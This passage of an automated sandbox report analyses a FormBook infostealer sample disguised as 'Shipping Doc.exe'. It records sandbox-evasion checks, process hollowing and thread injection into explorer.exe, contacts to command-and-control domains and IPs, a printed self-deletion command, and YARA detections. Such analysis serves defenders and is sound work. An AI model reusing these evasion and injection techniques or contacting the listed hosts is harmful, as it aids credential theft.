          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF6C push eax; ret 4_2_0041CF72
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF02 push eax; ret 4_2_0041CF08
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF0B push eax; ret 4_2_0041CF72
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004167BF push ecx; iretd 4_2_004167C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053ED0D1 push ecx; ret 15_2_053ED0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214A19 push ebp; ret 15_2_03214A1C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF02 push eax; ret 15_2_0321CF08
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF0B push eax; ret 15_2_0321CF72
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF6C push eax; ret 15_2_0321CF72
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032167BF push ecx; iretd 15_2_032167C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214F99 pushfd ; retf 15_2_03214F9A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032046A7 push edx; ret 15_2_032046AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CEB5 push eax; ret 15_2_0321CF08
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2014231354
          Source: Shipping Doc.exe, jtOONAqGyrOQ0u8Ixk/bpT4mwco1CD693b7CN.csHigh entropy of concatenated method names: '.cctor', '.ctor', '.ctor', 'oPOobRO5Vf', 'xm0o4Sf5NR', 'iEhoUBHjQn', 'ijuoVsDDg2', 'MQ3opPNGI1', 'S3PoaRe2Zm', 'nWyo9cofXu'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE3
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409A90 rdtsc 4_2_00409A90
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 5516Thread sleep time: -39781s >= -30000s
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 6132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3340Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 1392Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 39781
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.280370116.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.273037707.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.280812513.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.311184656.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_0040ACD0 LdrLoadDll
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.davinescosmetics.com
          Source: C:\Windows\explorer.exe | Domain query: www.bigdaddy.fish
          Source: C:\Windows\explorer.exe | Network Connect: 208.113.204.236 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: DE0000
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: explorer.exe, 00000006.00000000.262269287.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Users\user\Desktop\Shipping Doc.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipping Doc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 121 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
